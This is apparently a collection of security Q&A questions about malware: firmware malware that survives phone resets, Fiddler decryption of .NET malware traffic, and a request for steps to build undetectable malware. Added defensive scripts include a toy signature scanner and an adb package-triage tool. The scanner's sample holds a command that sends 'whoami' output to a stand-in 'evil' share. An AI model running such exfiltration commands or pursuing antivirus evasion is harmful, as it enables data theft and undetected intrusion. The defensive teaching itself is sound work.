Chinese cell phone possessed by the devil – how to exorcise evil malware?

Some months ago, I purchased an Azumi cell phone from an official store in a shopping mall in Mexico and subsequently discovered its firmware contains a ton of malware. The malware connects with a server in China and downloads a load of malicious apps which then launch automatically and eventually render the phone so slow as to be unusable. I have just done a factory reset for the 5th time and expect it to run smoothly for a few weeks until the problems return. I tried installing a new ROM but it did not resolve the problem, possibly because the malware is hidden inside a partition. I am not at all literate with Android, but am willing to learn and do whatever is necessary to fix this phone. Please can someone advise or point me in the right direction? If I need to root it, how can I do this safely, and how can I locate the offending malware? What diagnostic tests can I perform to learn more about the problem? And if it’s easier to flash a new system, what is the most effective way to do this, and where can I locate a reliable ROM? The phone cost me $100 and the easiest thing would be to throw it in the trash. However, it’s a perfectly serviceable device and I resent wasting the resources that went into making it. Any help would be sincerely appreciated!

I am looking for names of malware that looks for certain applications, folders or ports before further execution; what are their names? [on hold]

Title says it.

Adding on: malware similar to Stuxnet that looks specifically for dates, Step 7 project folders, etc.

e.g. if the malware were targeting port 3306 (MySQL), it would have to scan for port 3306 and then exfiltrate data; without port 3306 present on the host, it would terminate.

What are the steps of making a fully undetectable piece of malware?

I’ve recently been taught how antiviruses work. I know that there is more to it, but they basically have a list of known malware that they have encountered, and every time they scan, they check if their database content matches the files being scanned (I heard this in an algorithms & data structures class).

Now my question is, what are the steps and things to consider when an attacker wants to make a piece of malware look eligible?

Should the malware be brand new, so that no one has ever encountered it, or are there practices that take down the previous assumption?
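The question assumes a scanner holds a list of known files and checks each scanned file against it. The toy scanner below, an added example that is not part of the question or any answer and not any vendor's code, implements exactly that lookup as a SHA-256 database and puts a second kind of signature next to it: a byte pattern covering behaviour shared by a family. The samples are harmless constructed byte strings, and the signature names and regex are invented. Running it shows why "brand new" is not the whole story: changing a few bytes of a known file defeats the hash lookup, but the pattern signature still fires on the edited copy.

```python
"""Toy signature scanner: exact-hash signatures next to byte-pattern signatures.

Added example, not code from the original question or from any AV vendor.
The "samples" are constructed byte strings (harmless), and the signature
names and patterns are invented for illustration.
"""
import hashlib
import re

# Constructed samples. SAMPLE_A stands in for a file an AV vendor has already
# seen; SAMPLE_A_VARIANT is the same file with a few bytes changed, which is
# what a trivially repacked or edited copy looks like to a scanner.
SAMPLE_A = (b"MZ\x90\x00" + b"\x00" * 60
            + b"cmd.exe /c whoami > \\\\evil\\share\\out.txt")
SAMPLE_A_VARIANT = SAMPLE_A.replace(b"out.txt", b"log.txt")
SAMPLE_CLEAN = b"MZ\x90\x00" + b"\x00" * 60 + b"Hello, world"

# Signature type 1: exact SHA-256 of a known-bad file (the "list of known
# malware" from the question). Any change to the file breaks the match.
HASH_SIGNATURES = {
    hashlib.sha256(SAMPLE_A).hexdigest(): "Toy.Dropper.A",
}

# Signature type 2: a byte pattern covering the behaviour the family shares,
# independent of the exact bytes around it. The regex is invented.
PATTERN_SIGNATURES = [
    ("Toy.Dropper.A.gen", re.compile(rb"cmd\.exe /c \w+ > \\\\\w+\\share\\")),
]


def scan_hash(data: bytes) -> list[str]:
    """Return signature names whose exact file hash matches."""
    digest = hashlib.sha256(data).hexdigest()
    name = HASH_SIGNATURES.get(digest)
    return [name] if name else []


def scan_patterns(data: bytes) -> list[str]:
    """Return signature names whose byte pattern occurs anywhere in the file."""
    return [name for name, rx in PATTERN_SIGNATURES if rx.search(data)]


def scan(data: bytes) -> list[str]:
    """Combined verdict list, sorted so results are stable."""
    return sorted(set(scan_hash(data)) | set(scan_patterns(data)))


if __name__ == "__main__":
    for label, sample in [("original", SAMPLE_A),
                          ("variant", SAMPLE_A_VARIANT),
                          ("clean", SAMPLE_CLEAN)]:
        print(f"{label:9s} -> {scan(sample) or 'no detection'}")
```

The original sample hits both signatures, the edited copy hits only the pattern signature, and the clean sample hits neither. Real products layer more on top of this (emulation, behaviour monitoring, reputation), so the hash list the question describes is the weakest of the checks a sample has to pass, not the only one.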

How to avoid malware DIY

Most “how-tos” regarding malware list this:

  1. Install Antivirus software.
  2. Install latest antivirus software.
  3. Run antivirus software regularly.
  4. Install latest operating system.
  5. Install any patches to software.
  6. Don’t download random stuff and run it as an application (like .exe files).

I would like to know in a little more detail what all those first steps mean, and what else could be included in this list. For example, Little Snitch blocks all outgoing and incoming traffic and lets you inspect it first. That would be a good thing to do. Then there is potentially being alerted whenever a script is invoked that you didn’t write yourself or that isn’t installed from a trusted vendor. I’d like to know what other kinds of things you should do beyond this list to have an ideal security environment in regards to avoiding malware.

How to remove a persistent malware?

My Samsung Note 8 has gotten very weird lately. I get programs I never installed, and when I reboot/reset my device with no backup, they still come up after I’m finished with the reboot.

I also have 2 cards in my “SIM”, but I only have 1? And I can’t access the number. It also shows 2 different IMEIs.

The programs with weird names have all the permissions on my device. Some of them I can’t delete, some I can’t force stop, and they start running after some time.

Facebook was already installed when I did a reboot and the programs started coming in. I have a secure file on my phone. But this program has permission to everything.

How do I get rid of this problem? Do I root my phone? Can some of you guys please help me with this? This is making me a little paranoid.

Some of the programs:

  • Dagger
  • Customrabsclient
  • flexbox
  • istrumentzip
  • OpenCenus
  • rxandroid2
  • agera
  • customclient

I have used many anti-viruses like McAfee, Bitdefender, etc. I have factory reset my computer 2 times, but nothing changes. I have now downloaded AFWall+ to try to stop all these files, but I want to delete them all.

And when I check root manager it says that my phone is not rooted in the proper way. I never ever have rooted this phone.
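The Azumi question earlier on this page and the Note 8 question above describe the same symptom: unwanted apps that come back after a factory reset. A factory reset rewrites /data, so anything whose APK sits on a read-only firmware partition (/system, /vendor, /product, /oem, /odm) is untouched by it, and the first diagnostic step for both phones is to find out which partition each package is installed from. The script below is an added example, not part of either post and not an Android tool. It parses the output of `adb shell pm list packages -f` (USB debugging is required; root is not), flags packages on firmware partitions that are absent from a known-good baseline, and prints the no-root `pm uninstall -k --user 0` commands that remove them for the primary user. The listing, the baseline and the non-AOSP package names are constructed and are not claimed to be malicious.

```python
"""Triage of `adb shell pm list packages -f` output: which installed packages
live on partitions that a factory reset does not rewrite.

Added example, not from either post and not an Android tool. The listing and
the baseline below are constructed for illustration; the non-AOSP package
names are invented and not claimed to be malicious.
"""
import re

# Constructed `pm list packages -f` output. The real command prints one
# "package:<apk path>=<package name>" line per installed package.
SAMPLE_LISTING = """\
package:/system/app/Bluetooth/Bluetooth.apk=com.android.bluetooth
package:/system/priv-app/Settings/Settings.apk=com.android.settings
package:/system/app/CustomClient/CustomClient.apk=com.example.customclient
package:/vendor/app/Agera/Agera.apk=com.example.agera
package:/data/app/com.example.rxandroid2-1/base.apk=com.example.rxandroid2
package:/data/app/com.facebook.katana-1/base.apk=com.facebook.katana
"""

# Packages expected on a clean build of this model (constructed; in practice
# take the list from a known-good device running the same firmware version).
STOCK_BASELINE = {"com.android.bluetooth", "com.android.settings"}

# Read-only firmware partitions. Their contents survive a factory reset,
# which wipes /data and the cache but not the firmware images.
FIRMWARE_PREFIXES = ("/system/", "/vendor/", "/product/", "/oem/", "/odm/")

PM_LINE = re.compile(r"^package:(?P<path>.+)=(?P<pkg>[A-Za-z0-9_.]+)$")


def parse_listing(text: str) -> list[tuple[str, str]]:
    """Return (package_name, apk_path) pairs; lines that are not package
    lines (warnings, blanks) are skipped."""
    entries = []
    for line in text.splitlines():
        m = PM_LINE.match(line.strip())
        if m:
            entries.append((m.group("pkg"), m.group("path")))
    return entries


def classify(entries, baseline):
    """Bucket packages by where they live and whether they are expected."""
    buckets = {"baseline": set(), "firmware_unexpected": set(),
               "user_installed": set(), "other": set()}
    for pkg, path in entries:
        if pkg in baseline:
            buckets["baseline"].add(pkg)
        elif path.startswith(FIRMWARE_PREFIXES):
            buckets["firmware_unexpected"].add(pkg)
        elif path.startswith("/data/"):
            buckets["user_installed"].add(pkg)
        else:
            buckets["other"].add(pkg)
    return buckets


def removal_commands(pkgs) -> list[str]:
    """Commands that remove a package for the primary user without root.
    The APK stays on the firmware partition, so it returns after a reset."""
    return [f"adb shell pm uninstall -k --user 0 {pkg}" for pkg in sorted(pkgs)]


if __name__ == "__main__":
    buckets = classify(parse_listing(SAMPLE_LISTING), STOCK_BASELINE)
    for name, pkgs in buckets.items():
        print(f"{name}: {sorted(pkgs)}")
    print("\n".join(removal_commands(buckets["firmware_unexpected"])))
```

To use it on a real device, save `adb shell pm list packages -f` to a file and pass that text to `parse_listing` instead of `SAMPLE_LISTING`, and build the baseline from a clean device of the same model and firmware version rather than guessing. Two caveats: `pm uninstall -k --user 0` only hides the package for user 0, so the APK is still on the partition and the next factory reset brings it back; and a component the firmware itself starts (a preloaded dropper that downloads the visible apps) has to be found and removed with the rest, or the apps reappear without any reset. For code baked into a firmware partition, the durable fix is reflashing a complete, clean image for the exact model, which is what the Azumi poster was trying to do when a partial ROM did not help.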

How can I identify the cache if I see its name? One belongs to malware

If the Device maintenance app is launched on a Samsung S8, after pressing the Clean Now button, storage cleanup briefly shows the different apps whose storage space is being cleaned:

  • System cache
  • OneNote
  • TopBuzz

I know that the last one is malware and is not present in my list of apps, but how can I find out to which app it actually belongs? No antivirus which I have tried so far reported this as malware. But maybe there is some system analyzer which shows cache ownership like the above app, but with more details?

(Or maybe there is another method to find the origin of that TopBuzz symptom.)

The phone is not rooted.

Decrypting SSL traffic using Fiddler to see requests being sent by malware written in .NET

I tried to find the GET data of some malware but it appears that this malware is encrypting traffic using SSL.

When I tried to decrypt the SSL data via Fiddler, I always get nothing — only information about the SSL configuration as you can see in the picture.

  • I installed Fiddler’s root certificate;
  • This is .NET malware.

Is there a way to read the data?